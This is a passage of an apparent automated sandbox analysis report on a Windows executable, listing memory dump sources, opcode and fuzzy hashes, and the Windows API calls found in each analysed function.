                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                                  • Instruction ID: 33b9de73c5357426475d1ecb6718d507a7f793f52192090568aa5f1be2fe3f26
                                                                  • Opcode Fuzzy Hash: 06ef8f5a1822f0b757ae31e3b83f809751af444a1e9c2dfe7d230d3dce02f925
                                                                  • Instruction Fuzzy Hash: D8714671E04228CBDF28CF98C8847ADBBB1FF44305F15856AD856BB281C7786986DF45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                                  • Instruction ID: eebb37c65e2131d6119e05978ba22ffeb7e1a1a57c5d17d20a151e235b5fbeda
                                                                  • Opcode Fuzzy Hash: cfd14bdf320e39a62d2c2df30edf7cb1e1c63a24431ff8987f761f3d68dc011c
                                                                  • Instruction Fuzzy Hash: DD714771E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7786A86DF45
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00403492
                                                                    • Part of subcall function 004035FD: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 004034C5
                                                                  • SetFilePointer.KERNELBASE(0010A7C7,00000000,00000000,00414EF0,00004000,?,00000000,004033A8,00000004,00000000,00000000,?,?,00403322,000000FF,00000000), ref: 004035C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer$CountTick
                                                                  • String ID:
                                                                  • API String ID: 1092082344-0
                                                                  • Opcode ID: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                                  • Instruction ID: 0007fe48f9bd4e0bdf6fbdcb7c574e60e63cda3bf49c02497359f5fe5cde5340
                                                                  • Opcode Fuzzy Hash: 1344b17e1481b80582bdb0ed23b8c3804af25e72a501c03e477dd398e9b7707c
                                                                  • Instruction Fuzzy Hash: C7319172600215EBC7309F29EE848163BADF744356755023BE501B26F1CBB5AE42DB9D
                                                                  APIs
                                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nspD8D5.tmp,00000000,00000011,00000002), ref: 00402602
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Enum$CloseValue
                                                                  • String ID:
                                                                  • API String ID: 397863658-0
                                                                  • Opcode ID: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
                                                                  • Instruction ID: 0e7c906900fe31acaf330cad7c7adc7318663c551a7f251ed3955534a0ac5e15
                                                                  • Opcode Fuzzy Hash: 0dba00214060772b269aec70c88b8c4dcefe1b236ecbe69e4432b09e807f707b
                                                                  • Instruction Fuzzy Hash: 3D017171904205ABEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403322,000000FF,00000000,00000000,00008001,?), ref: 0040339B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                                  • Instruction ID: 810e563441ec60ddb2e304251acab09d4dc6a46a8481b8ea59e7f14a092257d1
                                                                  • Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                                  • Instruction Fuzzy Hash: E231B170200209BFDB129F59DD44E9A3FA9EB04355F10843AF904EA191D3788E51DBA9
                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                  • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                                  • Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
                                                                  • Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                                  • Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C
                                                                  APIs
                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseDeleteValue
                                                                  • String ID:
                                                                  • API String ID: 2831762973-0
                                                                  • Opcode ID: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
                                                                  • Instruction ID: 5f3bbf62c25f8db8e4007b741f5cecc6338069a28fa7be666feaa9c5da8c1564
                                                                  • Opcode Fuzzy Hash: bb53019bc6b0262c1a7ba30a0e76d60d513ae05c0bd0953298f21ea634c4095c
                                                                  • Instruction Fuzzy Hash: FCF06232A04520ABDB10BBA89A8DAEE62A5AF54314F11443FE542B71C1CAFC4D02976D
                                                                  APIs
                                                                  • CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C18
                                                                  • GetLastError.KERNEL32 ref: 00405C26
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1375471231-0
                                                                  • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                  • Instruction ID: c951f985784cdd1ce4bfd292213bf749a6eab04c72170860fc3503b4537cd402
                                                                  • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                  • Instruction Fuzzy Hash: 67F0F4B0C04209DAEB00CFA4D9487EFBBB4FB04309F00842AD541B6281DBB882488BA9
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                                  • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID:
                                                                  • API String ID: 3712363035-0
                                                                  • Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                                  • Instruction ID: 40cf053be3b9956ee682ea3cdb0c0f8171e7446c395677da6238e6dd92eb787c
                                                                  • Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                                  • Instruction Fuzzy Hash: A4E0BFB4600219BFFB109B64EE49F7B7B7CEB00648F418425BD14F2551D77498149A7C
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                                    • Part of subcall function 00406A06: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                                    • Part of subcall function 00406A06: wsprintfW.USER32 ref: 00406A58
                                                                    • Part of subcall function 00406A06: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2547128583-0
                                                                  • Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                                  • Instruction ID: b294046d3e4dddd9dd595f306a5883e4a37f4b9faaa0bea25d2c73fe5553ab8f
                                                                  • Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                                  • Instruction Fuzzy Hash: DFE08636704610AAD610BA709E48C6773A89F86710302C83FF546F6140D738DC32AA79
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\x6yDsHJ9tr.exe,80000000,00000003), ref: 00406176
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                  • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                                  • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                  • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                                  APIs
                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                                  • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C44
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1375471231-0
                                                                  • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                  • Instruction ID: 9ee767d7bb24d12ef4013e29ffdbd8bf560f6e5ed3fd997729cc5c4a92c9c995
                                                                  • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                  • Instruction Fuzzy Hash: 4EC08C30208601DAEA040B30DE08F073A50BB00340F214439A082E40A4CA308004CD2D
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000), ref: 73472C57
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true
                                                                  • Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: 7a05ccaad1b6662d3dd4d13e61060b607dd5efce7e322a578149e2ce4aea1d29
                                                                  • Instruction ID: 9c435f2961e39c9e0027189cda07adf99122f04ff0ca27312e0ffaf6570251c8
                                                                  • Opcode Fuzzy Hash: 7a05ccaad1b6662d3dd4d13e61060b607dd5efce7e322a578149e2ce4aea1d29
                                                                  • Instruction Fuzzy Hash: 73419EB290034CEFEB2DAF65D985BD937F9FB45310F308869E409EA240D6399481CBD9
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4
                                                                    • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointerwsprintf
                                                                  • String ID:
                                                                  • API String ID: 327478801-0
                                                                  • Opcode ID: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
                                                                  • Instruction ID: a9a910f18d9475f192186a99a32baa3f0737176f8f71227260f04108cb8f5765
                                                                  • Opcode Fuzzy Hash: be6f6e28811eff9f61e37437ffce11e37693180493ed76b7cb4b0af79cd2cf68
                                                                  • Instruction Fuzzy Hash: CEE06D71A04108BFDB01ABA5BE499AEB3B9EB44354B20483FF102B00C8CA784D119A2D
                                                                  APIs
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
